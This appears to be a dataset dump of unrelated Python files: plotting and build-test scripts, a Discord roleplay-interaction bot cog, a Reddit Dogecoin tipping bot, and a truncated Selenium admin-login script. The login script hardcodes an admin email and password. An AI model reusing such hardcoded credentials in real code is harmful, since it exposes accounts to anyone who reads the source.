text
stringlengths 8
6.05M
|
|---|
# pi_list = list()
# pi1 = int(input("Введите делимое: "))
# pi2 = int(input("Введите делитель: "))
# for i in range(8):
# pi3 = (pi1 / pi2)
# pi_list.append(pi3)
# pi2 += 2
# pi = float(pi_list[0] - pi_list[1] + pi_list[2] - pi_list[3] + pi_list[4] - pi_list[5] + pi_list[6] - pi_list[7])
# print("Сумма ряда Лейбница первых 8 членов = ", pi)
#import math
#n=20
#x=int(input("Введите искомое число"))
#if x==1
|
#! /usr/bin/python3
import sys
import os
sys.path.insert(0, os.path.abspath('../models'))
import numpy as np
import matplotlib.pyplot as plt
from network import MutualInhibit
def f(s):
return 50 * (1 + np.tanh(s))
#1
def plot_nullclines(ls='-'):
MutualInhibit(f, np.r_[0,0]).plot_nullclines(ls=ls)
plt.legend()
#2
def x_evolution(x0s):
plot_nullclines('--')
for x0 in x0s:
network = MutualInhibit(f, x0)
network.simulate(100)
network.plot_x_his()
#3
def vector_field():
X, Y = np.meshgrid(np.linspace(-50, 150, 15), np.linspace(-50, 150, 15))
U = -X + f(-0.1*Y+5)
V = -Y + f(-0.1*X+5)
Q = plt.quiver(X, Y, U, V, units='xy', scale=20, lw=0.8)
plt.quiverkey(Q, 0.05, 1.05, 200, '200', labelpos='E')
MutualInhibit(f, np.r_[0,0]).plot_nullclines(ls='--', lw=0.8)
lgd = plt.legend(loc=9, bbox_to_anchor=(0.77, 1.12), ncol=2)
return (lgd,)
x0s = np.array([[-50, -50], [-25, -50], [100, 130], [3, 50], [-40, 150],
[150, 90], [140, 141], [75, -50]])
cmd_functions = ([
plot_nullclines,
lambda: x_evolution(x0s),
vector_field,
])
if __name__ == "__main__":
n = int(sys.argv[1])
art = cmd_functions[n-1]()
plt.savefig(
"../../figures/mutual{}".format(n),
bbox_extra_artists=art, bbox_inches='tight')
plt.show()
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies rules related variables are expanded.
"""
import sys
if sys.platform == 'win32':
print "This test is currently disabled: https://crbug.com/483696."
sys.exit(0)
import TestGyp
test = TestGyp.TestGyp(formats=['ninja'])
test.relocate('src', 'relocate/src')
test.run_gyp('variables.gyp', chdir='relocate/src')
test.build('variables.gyp', chdir='relocate/src')
test.run_built_executable('all_rule_variables',
chdir='relocate/src',
stdout="input_root\ninput_dirname\ninput_path\n" +
"input_ext\ninput_name\n")
test.pass_test()
|
import random
import discord
import asyncio
from discord.ext import commands
from DTbot import bot
from linklist import baddoggo_links, bkiss_links, blush_links, cage_links, cry_links, cuddle_links, glomp_links, handholding_links, highfive_links, hug_links, kiss_links, kick_links, lewd_links, lick_links, pat_links, pinch_links, poke_links, punch_links, slap_links, stab_links, tickle_links, whip_links
class Interaction():
"""Commands which interact with others"""
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True,
description="Call someone a bad doggo",
brief="Call someone a bad doggo",
aliases=['shame', 'baddog'])
async def baddoggo(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} called themselves a bad doggo. I think they just misspoke. Because if they were a doggo, they'd be a good one. A very good one.".format(ctx.message.author.mention))
else:
possible_responses = baddoggo_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + ", you're being a very bad dog! {} is disappointed in you!".format(ctx.message.author.mention) + "\n\n[Image Link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Bitch slaps someone",
brief="Bitch slaps someone")
async def bitchslap(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to give themselves a mean bitch slap. All they decide to do is rub their cheeks.".format(ctx.message.author.mention))
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got a bitch slap.".format(user.mention) + "\n\n[Image link](https://i.imgur.com/bTGigCv.gif)")
embed.set_image(url="https://i.imgur.com/bTGigCv.gif")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Kiss someone the non-romantic way",
brief="A non-romantic kiss")
async def bkiss(self, ctx, user: discord.Member):
possible_responses = bkiss_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} kissed themselves in a non-romantic way. It's very important to be happy about oneself, though self-love is even better!".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got kissed.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Blush\nCan be given a reason",
brief="Blush")
async def blush(self, ctx, *reason: str):
possible_responses = blush_links
chosen = random.choice(possible_responses)
if reason:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} blushed because of ".format(ctx.message.author.mention) + ' '.join(reason) + "! How cute!\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} blushed! How cute!".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Cuddle someone",
brief="Cuddle someone")
async def cuddle(self, ctx, user: discord.Member):
possible_responses = cuddle_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} cuddled themselves! They seem so happy about being here.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got cuddled.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Cage someone",
brief="Cage someone")
async def cage(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Just as {} tried to enter the cage, their friends surprised them with a party. Hooray!".format(ctx.message.author.mention))
else:
possible_responses = cage_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got caged.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Confess your feelings to someone",
brief="Confess your feelings to someone")
async def confess(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} confessed their love for themselves! Aww, what a great example of self-love.".format(user.mention))
message = await self.bot.say(embed=embed)
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + ", you've been confessed to by {}!".format(ctx.message.author.mention) + "\nWill you let the ship set sail or will you sink it before its journey starts? " + u"\u26F5")
message = await self.bot.say(embed=embed)
await self.bot.add_reaction(message, u"\u2764")
await self.bot.add_reaction(message, u"\U0001F494")
await asyncio.sleep(1)
def check(reaction, user):
e = str(reaction.emoji)
return e.startswith((u"\u2764", u"\U0001F494"))
response = await self.bot.wait_for_reaction(message=message, check=check)
if response.user.id == user.id:
if response.reaction.emoji == u"\u2764":
await self.bot.say("**{0.user.display_name}** accepted **{1}'s** feelings! The ship has set sail! Congratulations! :heart: :sailboat:".format(response, ctx.message.author.display_name))
elif response.reaction.emoji == u"\U0001F494":
await self.bot.say("**{0.user.display_name}** rejected **{1}**! Don't worry, I have ice cream buckets for you. :ice_cream: <:kannahug:461996510637326386>".format(response, ctx.message.author.display_name))
else:
return
else:
return
@commands.command(pass_context=True,
description="Cry\nCan be given a reason",
brief="Cry")
async def cry(self, ctx, *reason: str):
possible_responses = cry_links
chosen = random.choice(possible_responses)
if reason:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(ctx.message.author.mention) + " is crying because of " + ' '.join(reason) + ". Someone, comfort them. <:kannahug:461996510637326386>\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(ctx.message.author.mention) + " is crying. Someone, comfort them. <:kannahug:461996510637326386>\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Glomp someone",
brief="Glomp someone")
async def glomp(self, ctx, user: discord.Member):
possible_responses = glomp_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} glomped themselves! Someone is very happy to see themselves!".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + " got a glomp from {}.".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Hold someone's hand",
brief="Hold someone's hand",
aliases=['handhold', 'holdhand'])
async def handholding(self, ctx, user: discord.Member):
possible_responses = handholding_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to hold their own hand. Aww. Come here, I'll hold it for you.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(ctx.message.author.mention) + " is holding {}'s hand! How lewd!".format(user.mention) + "\n\n[Image Link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="High five someone",
brief="High five someone",
aliases=['5'])
async def highfive(self, ctx, user: discord.Member):
possible_responses = highfive_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} gave themselves a high five! You go! Gotta congratulate yourself when others don't.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + " got a high five from {}.".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Hug someone",
brief="Hug someone")
async def hug(self, ctx, user: discord.Member):
possible_responses = hug_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} hugged themselves! Hooray for self-appreciation!".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got hugged.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="What do you think it does",
brief="It's in the name")
async def kill(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to kill themselves. Luckily, they changed their mind and went to get food instead.".format(ctx.message.author.mention))
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got killed.".format(user.mention))
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Kiss someone",
brief="Kiss someone")
async def kiss(self, ctx, user: discord.Member):
possible_responses = kiss_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} gave themselves a kiss! Self-love is very important after all.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got kissed.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="KICK THEIR ASS\n\n(This is NOT a moderation command to kick a user from a server.)",
brief="Kick someone")
async def kick(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} aimed to kick themselves. As they noticed, it's quite hard to actually do. So they didn't and went to watch their favorite show.".format(ctx.message.author.mention))
else:
possible_responses = kick_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got kicked.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="For something LEWD",
brief="LEWD")
async def lewd(self, ctx, user: discord.Member = None):
possible_responses = lewd_links
chosen = random.choice(possible_responses)
if user:
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Calling yourself out for being lewd, **{}**? How self-aware you are. And yes. Why you gotta be so lewd?".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Why you gotta be so lewd, **{}**?".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Why you gotta be so lewd?\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Lick someone",
brief="Lick someone")
async def lick(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} licked themselves. Maybe they are secretly a cat and value personal hygiene?".format(ctx.message.author.mention))
else:
possible_responses = lick_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{0} licked {1}.".format(ctx.message.author.mention, user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Notice someone",
brief="Notice someone")
async def notice(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} noticed themselves. Yes, you are here, and yes, it's good you are.".format(ctx.message.author.mention))
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{0} got noticed by {1}.".format(user.mention, ctx.message.author.mention))
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Pat someone",
brief="Pat someone")
async def pat(self, ctx, user: discord.Member):
possible_responses = pat_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} patted themselves. They deserve all the pats!".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got a pat.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Pinch someone's cheeks",
brief="Pinch someone's cheeks")
async def pinch(self, ctx, user: discord.Member):
possible_responses = pinch_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} pinched their own cheeks. Maybe they wanted to check if they were dreaming or not?".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got their cheeks pinched.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Poke someone",
brief="Poke someone")
async def poke(self, ctx, user: discord.Member):
possible_responses = poke_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} poked themselves. It wasn't hard at all, just a soft boop. And they deserve a boop.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got poked.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Someone gonna get punched",
brief="Punch club")
async def punch(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} wanted to punch themselves. But they only lightly rubbed their belly.".format(ctx.message.author.mention))
else:
possible_responses = punch_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got punched.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Slap 'em hard",
brief="Slap someone")
async def slap(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to slap themselves. 'Twas but a gentle caressing.".format(ctx.message.author.mention))
else:
possible_responses = slap_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got slapped.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Stab someone",
brief="Stab someone")
async def stab(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tried to stab themselves. Fortunately, their aim was off.".format(ctx.message.author.mention))
else:
possible_responses = stab_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{}".format(user.mention) + " got stabbed by {}.".format(ctx.message.author.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Tickle someone",
brief="Tickle someone")
async def tickle(self, ctx, user: discord.Member):
possible_responses = tickle_links
chosen = random.choice(possible_responses)
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} tickled themselves. They must be really ticklish if they can do that!".format(user.mention) + "\n\n[Image link](" + chosen + ")")
else:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} got tickled.".format(user.mention) + "\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
@commands.command(pass_context=True,
description="Whip someone (rather kinky)",
brief="Whip someone")
async def whip(self, ctx, user: discord.Member):
if user.id == ctx.message.author.id:
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="{} wants to whip themselves. They must be really kinky.".format(ctx.message.author.mention))
else:
possible_responses = whip_links
chosen = random.choice(possible_responses)
embed = discord.Embed(colour=discord.Colour(0x5e51a8), description="Bow down, {}.".format(user.mention) + " Time for a whipping!\n\n[Image link](" + chosen + ")")
embed.set_image(url="" + chosen + "")
await self.bot.say(embed=embed)
def setup(bot):
bot.add_cog(Interaction(bot))
|
import time
import datetime
import traceback
from jinja2 import Template
from praw.models import Comment
import bot_logger
import config
import crypto
import lang
import re
import user_function
import utils
import dogetipper
def register_user(rpc, msg):
if not user_function.user_exist(msg.author.name):
address = rpc.getnewaddress("reddit-%s" % msg.author.name)
if address:
msg.reply(
Template(lang.message_register_success + lang.message_footer).render(username=msg.author.name,
address=address))
user_function.add_user(msg.author.name, address)
user_function.add_to_history(msg.author.name, "", "", "", "register")
# create a backup of wallet
rpc.backupwallet(
config.backup_wallet_path + "backup_" + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S') + ".dat")
else:
bot_logger.logger.warning('Error during register !')
else:
bot_logger.logger.info('%s are already registered ' % msg.author.name)
balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
address = user_function.get_user_address(msg.author.name)
msg.reply(Template(lang.message_already_registered + lang.message_account_details + lang.message_footer).render(
username=msg.author.name,
address=address, balance=str(balance))
)
def balance_user(rpc, msg):
if user_function.user_exist(msg.author.name):
balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
pending_balance = crypto.get_user_unconfirmed_balance(rpc, msg.author.name)
spendable_balance = crypto.get_user_spendable_balance(rpc, msg.author.name) + balance
bot_logger.logger.info('user %s balance = %s' % (msg.author.name, balance))
balance_value_usd = utils.get_coin_value(balance)
pending_value_usd = utils.get_coin_value(pending_balance)
spendable_value_usd = utils.get_coin_value(spendable_balance)
msg.reply(
Template(lang.message_balance + lang.message_footer).render(username=msg.author.name, balance=str(balance),
balance_value_usd=str(balance_value_usd),
pendingbalance=str(pending_balance),
pending_value_usd=str(pending_value_usd),
spendablebalance=str(spendable_balance),
spendable_value_usd=str(spendable_value_usd)))
user_function.add_to_history(msg.author.name, "", "", balance, "balance")
else:
bot_logger.logger.info('user %s not registered ' % msg.author.name)
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
def info_user(rpc, msg):
if user_function.user_exist(msg.author.name):
address = user_function.get_user_address(msg.author.name)
balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
pending_balance = crypto.get_user_unconfirmed_balance(rpc, msg.author.name)
spendable_balance = crypto.get_user_spendable_balance(rpc, msg.author.name) + balance
balance_value_usd = utils.get_coin_value(balance)
pending_value_usd = utils.get_coin_value(pending_balance)
spendable_value_usd = utils.get_coin_value(spendable_balance)
msg.reply(Template(lang.message_account_details + lang.message_footer).render(
username=msg.author.name,
balance=str(balance),
balance_value_usd=str(balance_value_usd),
pendingbalance=str(pending_balance),
pending_value_usd=str(pending_value_usd),
spendablebalance=str(spendable_balance),
spendable_value_usd=str(spendable_value_usd),
address=address))
else:
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
def help_user(rpc, msg):
if user_function.user_exist(msg.author.name):
address = user_function.get_user_address(msg.author.name)
msg.reply(Template(lang.message_help + lang.message_footer).render(
username=msg.author.name, address=address))
else:
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
def withdraw_user(rpc, msg, failover_time):
split_message = msg.body.strip().split()
if user_function.user_exist(msg.author.name):
sender_address = user_function.get_user_address(msg.author.name)
amount = float(split_message[1])
amount = round(amount-0.5)
print(amount)
user_balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
user_spendable_balance = crypto.get_user_spendable_balance(rpc, msg.author.name)
if utils.check_amount_valid(amount) and split_message[4] != sender_address:
if amount >= float(user_balance) + float(user_spendable_balance):
bot_logger.logger.info('user %s not have enough to withdraw this amount (%s), balance = %s' % (
msg.author.name, amount, user_balance))
msg.reply(Template(lang.message_balance_low_withdraw).render(
username=msg.author.name, user_balance=str(user_balance), amount=str(amount)) + lang.message_footer)
else:
receiver_address = split_message[4]
if time.time() > int(failover_time.value) + 86400:
send = crypto.send_to(rpc, sender_address, receiver_address, amount)
else:
send = crypto.send_to_failover(rpc, sender_address, receiver_address, amount)
if send:
user_function.add_to_history(msg.author.name, sender_address, receiver_address, amount,
"withdraw")
value_usd = utils.get_coin_value(amount)
msg.reply(Template(lang.message_withdraw + lang.message_footer).render(
username=msg.author.name, receiver_address=receiver_address, amount=str(amount),
value_usd=str(value_usd)))
elif split_message[4] == sender_address:
msg.reply(lang.message_withdraw_to_self + lang.message_footer)
else:
bot_logger.logger.info(lang.message_invalid_amount)
msg.reply(lang.message_invalid_amount + lang.message_footer)
else:
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
def tip_user(rpc, reddit, msg, tx_queue, failover_time):
bot_logger.logger.info('An user mention detected ')
bot_logger.logger.debug("failover_time : %s " % (str(failover_time.value)))
split_message = msg.body.lower().strip().split()
tip_index = split_message.index(str('+/u/' + config.bot_name))
if split_message[tip_index] == str('+/u/' + config.bot_name) and split_message[tip_index + 2] == 'doge':
amount = float(split_message[tip_index + 1])
amount = round(amount-0.5)
if utils.check_amount_valid(amount):
parent_comment = msg.parent()
if user_function.user_exist(msg.author.name) and (msg.author.name != parent_comment.author.name):
# check we have enough
user_balance = crypto.get_user_confirmed_balance(rpc, msg.author.name)
user_pending_balance = crypto.get_user_unconfirmed_balance(rpc, msg.author.name)
user_spendable_balance = crypto.balance_user(rpc, msg, failover_time)
bot_logger.logger.debug('user_spendable_balance = %s' % user_spendable_balance)
# in failover we need to use only user_balance
if amount >= float(user_spendable_balance):
# not enough for tip
if amount < float(user_pending_balance):
reddit.redditor(msg.author.name).message('pending tip', Template(lang.message_balance_pending_tip).render(username=msg.author.name))
else:
bot_logger.logger.info('user %s not have enough to tip this amount (%s), balance = %s' % (
msg.author.name, str(amount), str(user_balance)))
reddit.redditor(msg.author.name).message('low balance', Template(lang.message_balance_low_tip).render(username=msg.author.name))
else:
value_usd = utils.get_coin_value(amount)
# check user have address before tip
if user_function.user_exist(parent_comment.author.name):
txid = crypto.tip_user(rpc, msg.author.name, parent_comment.author.name, amount, tx_queue,
failover_time)
if txid:
user_function.add_to_history(msg.author.name, msg.author.name, parent_comment.author.name,
amount,
"tip send", txid)
user_function.add_to_history(parent_comment.author.name, msg.author.name,
parent_comment.author.name,
amount,
"tip receive", txid)
bot_logger.logger.info(
'%s tip %s to %s' % (msg.author.name, str(amount), parent_comment.author.name))
# if user have 'verify' in this command he will have confirmation
if split_message.count('verify') or int(amount) >= 1000:
msg.reply(Template(lang.message_tip).render(
sender=msg.author.name, receiver=parent_comment.author.name, amount=str(int(amount)),
value_usd=str(value_usd), txid=txid
))
else:
user_function.save_unregistered_tip(msg.author.name, parent_comment.author.name, amount,
msg.fullname)
user_function.add_to_history(msg.author.name, msg.author.name, parent_comment.author.name,
amount,
"tip send", False)
user_function.add_to_history(parent_comment.author.name, msg.author.name,
parent_comment.author.name,
amount,
"tip receive", False)
bot_logger.logger.info('user %s not registered' % parent_comment.author.name)
reddit.redditor(msg.author.name).message('tipped user not registered', Template(lang.message_recipient_register).render(username=parent_comment.author.name))
reddit.redditor(parent_comment.author.name).message(
Template(
lang.message_recipient_need_register_title).render(amount=str(amount)),
Template(
lang.message_recipient_need_register_message).render(
username=parent_comment.author.name, sender=msg.author.name, amount=str(amount),
value_usd=str(value_usd)))
elif user_function.user_exist(msg.author.name) and (msg.author.name == parent_comment.author.name):
reddit.redditor(msg.author.name).message('cannot tip self', Template(lang.message_recipient_self).render(username=msg.author.name))
else:
reddit.redditor(msg.author.name).message('tipped user not registered', Template(lang.message_need_register).render(username=msg.author.name))
else:
bot_logger.logger.info(lang.message_invalid_amount)
reddit.redditor(msg.author.name).message('invalid amount', lang.message_invalid_amount)
def history_user(msg):
if user_function.user_exist(msg.author.name):
data = user_function.get_user_history(msg.author.name)
history_table = "\n\nDate|Sender|Receiver|Amount|Action|Finish|\n"
history_table += "---|---|---|---|:-:|:-:\n"
for tip in data:
str_finish = "Pending"
if tip['finish']:
str_finish = "Successful"
history_table += "%s|%s|%s|%s|%s|%s|\n" % (
datetime.datetime.strptime(tip['time'], '%Y-%m-%dT%H:%M:%S.%f'), tip['sender'], tip['receiver'],
str(tip['amount']), tip['action'], str_finish)
msg.reply(Template(lang.message_history + history_table + lang.message_footer).render(username=msg.author.name))
else:
bot_logger.logger.info('user %s not registered ' % msg.author.name)
msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))
# Resend tips to previously unregistered users that are now registered
def replay_remove_pending_tip(rpc, reddit, tx_queue, failover_time):
# check if it's not too old & replay tipping
limit_date = datetime.datetime.now() - datetime.timedelta(days=3)
# check if user have pending tips
list_tips = user_function.get_unregistered_tip()
if list_tips:
for tip in list_tips:
bot_logger.logger.info("replay tipping check for %s" % str(tip['id']))
if (datetime.datetime.strptime(tip['time'], '%Y-%m-%dT%H:%M:%S.%f') > limit_date):
if (user_function.user_exist(tip['receiver'])):
bot_logger.logger.info(
"replay tipping %s - %s send %s to %s " % (
str(tip['id']), tip['sender'], tip['amount'], tip['receiver']))
txid = crypto.tip_user(rpc, tip['sender'], tip['receiver'], tip['amount'], tx_queue, failover_time)
user_function.remove_pending_tip(tip['id'])
value_usd = utils.get_coin_value(tip['amount'])
if 'message_fullname' in tip.keys():
msg_id = re.sub(r't\d+_(?P<id>\w+)', r'\g<id>', tip['message_fullname'])
msg = Comment(reddit, msg_id)
msg.reply(Template(lang.message_tip).render(
sender=tip['sender'], receiver=tip['receiver'], amount=str(tip['amount']),
value_usd=str(value_usd), txid=txid))
else:
bot_logger.logger.info(
"replay check for %s - user %s not registered " % (str(tip['id']), tip['receiver']))
else:
bot_logger.logger.info(
"delete old tipping - %s send %s for %s " % (tip['sender'], tip['amount'], tip['receiver']))
user_function.remove_pending_tip(tip['id'])
else:
bot_logger.logger.info("no pending tipping")
|
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.keys import Keys
import time
def admin_Portal():
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get('http://localhost/Ghurai-Bangladesh/admin/admin_login.html')
u = driver.current_url
txt_user = driver.find_element_by_name('email')
txt_password = driver.find_element_by_name('pass')
txt_user.send_keys('admin@ghuraibangladesh.com')
print('email input done')
txt_password.send_keys('mahir11')
print('password input done')
print('Now wait 3 second')
time.sleep(3)
btn = driver.find_element_by_xpath('/html/body/div/section/form/button')
btn.click()
print('login Successfully')
btnhomepage = driver.find_element_by_link_text('PORTAL')
time.sleep(3)
btnhomepage.click()
time.sleep(5)
btncustomer = driver.find_element_by_xpath('/html/body/div/section/button[1]')
btncustomer.click()
time.sleep(5)
print("customer option choose")
btnloadcust = driver.find_element_by_xpath('/html/body/button')
btnloadcust.click()
print("customer information fetch")
time.sleep(3)
txt_back_home = driver.find_element_by_xpath('/html/body/a')
txt_back_home.click()
print("Back to Admin HomePage")
time.sleep(3)
#complain json page
btncustomer = driver.find_element_by_xpath('/html/body/div/section/button[3]')
btncustomer.click()
time.sleep(5)
print("complain option choose")
btnloadcust = driver.find_element_by_xpath('/html/body/button')
btnloadcust.click()
print("complain information fetch")
time.sleep(3)
txt_back_home = driver.find_element_by_xpath('/html/body/a')
